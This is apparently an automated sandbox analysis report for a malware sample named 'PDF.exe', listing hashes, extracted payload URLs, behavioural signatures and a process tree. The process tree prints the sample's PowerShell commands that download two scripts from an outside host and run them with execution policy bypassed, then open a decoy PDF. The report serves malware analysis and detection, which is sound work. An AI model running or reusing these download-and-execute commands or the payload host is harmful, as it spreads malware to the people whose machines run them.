Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
21/01/2025, 13:31
250121-qspexswjes 1021/01/2025, 12:04
250121-n8tngasrhm 1013/07/2024, 12:59
240713-p8a2ss1gpq 10Analysis
-
max time kernel
117s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
21/01/2025, 12:04
Static task
static1
Behavioral task
behavioral1
Sample
PDF.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
PDF.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
PDF.exe
Resource
android-x86-arm-20240624-en
Behavioral task
behavioral4
Sample
PDF.exe
Resource
android-33-x64-arm64-20240624-en
Behavioral task
behavioral5
Sample
PDF.exe
Resource
macos-20241101-en
Behavioral task
behavioral6
Sample
PDF.exe
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral7
Sample
PDF.exe
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral8
Sample
PDF.exe
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral9
Sample
PDF.exe
Resource
debian9-mipsel-20240418-en
General
-
Target
PDF.exe
-
Size
258KB
-
MD5
34c2047d0b69ba023b700c21431accc0
-
SHA1
e34c28611707c81565cb73d8a1a46dfc3ab2495a
-
SHA256
ff9b39d07fd6e4a7f98d109664d91de9e318671da6412da85396541722d92799
-
SHA512
a1566d65beb8135edfcb5c4a09631bc17dff56db672621990a10d0eff37a0290c7e1e9705f1918a7e719cbea4b1cecc29bb8254da946108e9bd5432070cc8ca7
-
SSDEEP
6144:VbJhs7QW69hd1MMdxPe9N9uA0hu9TBrjJ0Xxne0AqGLj:VbjDhu9TV6xeJqG3
Malware Config
Extracted
http://thelustfactory.com/vns/1.ps1
Extracted
http://thelustfactory.com/vns/2.ps1
Signatures
-
pid Process 2808 powershell.exe 2632 powershell.exe 2524 powershell.exe 2404 powershell.exe -
HTTP links in PDF interactive object 1 IoCs
Detects HTTP links in interactive objects within PDF files.
resource yara_rule behavioral1/files/0x0006000000019275-59.dat pdf_with_link_action -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AcroRd32.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2388 timeout.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2676 AcroRd32.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2808 powershell.exe 2632 powershell.exe 2404 powershell.exe 2524 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2676 AcroRd32.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2808 powershell.exe Token: SeDebugPrivilege 2632 powershell.exe Token: SeDebugPrivilege 2404 powershell.exe Token: SeDebugPrivilege 2524 powershell.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 2676 AcroRd32.exe 2676 AcroRd32.exe 2676 AcroRd32.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 2244 wrote to memory of 2732 2244 PDF.exe 30 PID 2244 wrote to memory of 2732 2244 PDF.exe 30 PID 2244 wrote to memory of 2732 2244 PDF.exe 30 PID 2732 wrote to memory of 2808 2732 cmd.exe 32 PID 2732 wrote to memory of 2808 2732 cmd.exe 32 PID 2732 wrote to memory of 2808 2732 cmd.exe 32 PID 2732 wrote to memory of 2632 2732 cmd.exe 33 PID 2732 wrote to memory of 2632 2732 cmd.exe 33 PID 2732 wrote to memory of 2632 2732 cmd.exe 33 PID 2732 wrote to memory of 2404 2732 cmd.exe 34 PID 2732 wrote to memory of 2404 2732 cmd.exe 34 PID 2732 wrote to memory of 2404 2732 cmd.exe 34 PID 2732 wrote to memory of 2524 2732 cmd.exe 35 PID 2732 wrote to memory of 2524 2732 cmd.exe 35 PID 2732 wrote to memory of 2524 2732 cmd.exe 35 PID 2732 wrote to memory of 2388 2732 cmd.exe 36 PID 2732 wrote to memory of 2388 2732 cmd.exe 36 PID 2732 wrote to memory of 2388 2732 cmd.exe 36 PID 2732 wrote to memory of 2676 2732 cmd.exe 37 PID 2732 wrote to memory of 2676 2732 cmd.exe 37 PID 2732 wrote to memory of 2676 2732 cmd.exe 37 PID 2732 wrote to memory of 2676 2732 cmd.exe 37
Processes
-
C:\Users\Admin\AppData\Local\Temp\PDF.exeC:\Users\Admin\AppData\Local\Temp\PDF.exe sh $MOZILLA\nPLUGIN %SIGILL% "SIGTERM|DESTROY|SIGKILL"1⤵
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\42EA.tmp\42EB.tmp\42EC.bat C:\Users\Admin\AppData\Local\Temp\PDF.exe sh $MOZILLA\nPLUGIN %SIGILL% "SIGTERM|DESTROY|SIGKILL""2⤵
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('http://thelustfactory.com/vns/1.ps1', 'C:\Users\Admin\AppData\Roaming\1.ps1')"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2808
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('http://thelustfactory.com/vns/2.ps1', 'C:\Users\Admin\AppData\Roaming\2.ps1')"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2632
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\1.ps13⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2404
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\2.ps13⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2524
-
-
C:\Windows\system32\timeout.exetimeout /t 53⤵
- Delays execution with timeout.exe
PID:2388
-
-
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\pdf.pdf"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2676
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
712B
MD50e9ce5162ba7661c863a835f9d34d907
SHA10b351312ab57a02857753cab2287da680955f40d
SHA256b67f37e765a5be87d9591efdb0501f0c97aa342ad1e4c34a711828c4a505c81e
SHA5128d7c0a3cc95628cbec8a215f365c3ed86746e7b350c811ace5ea4419031adbdbe75dc7d1350d9c71db51f5cbb972db4e33b1d05e9a3e2a109c559eb065811ec0
-
Filesize
3KB
MD55a60195048a230a100a890591cc4fc6a
SHA1aa5fc5eabcf8f9f54d17e7a6bf7cf1dc166227d2
SHA25695e9dfde83527dce5810b6b5aea9dce59c1e0794c74be085adf83746611ab30d
SHA512d6c46608a69715081dba7bbfd6d70f6a22af7c7db533f4936104aff89574baf2e3a6f27d505df3f8236a1e6ebc6ff39bc425141fc277006f1f4c438db0b864db
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD582b7e31b119f3d25edc1a3385ce27a4e
SHA1148d968857377c20e43f0543f68781c732204d87
SHA25615cd1b61b8ee20af33f9ca335d382807ef5720663a33fe0b876354dede6adeb6
SHA512af66c45f2e8d721f6a21df1464fbc676496fb4339cb28675a869a8242c4ab12633bd5571f678b5b5122ac704b0e2e1eed7e19303c87dfcbe4e84baf4a092f051
-
Filesize
139KB
MD55afaf79789a776d81ec91ccbdc9fdaba
SHA16703901978dcb3dbf2d9915e1d3e066cfe712b0a
SHA25638c9792d725c45dd431699e6a3b0f0f8e17c63c9ac7331387ee30dcc6e42a511
SHA51209253eb87d097bdaa39f98cbbea3e6d83ee4641bca76c32c7eb1add17e9cb3117adb412d2e04ab251cca1fb19afa8b631d1e774b5dc8ae727f753fe2ffb5f288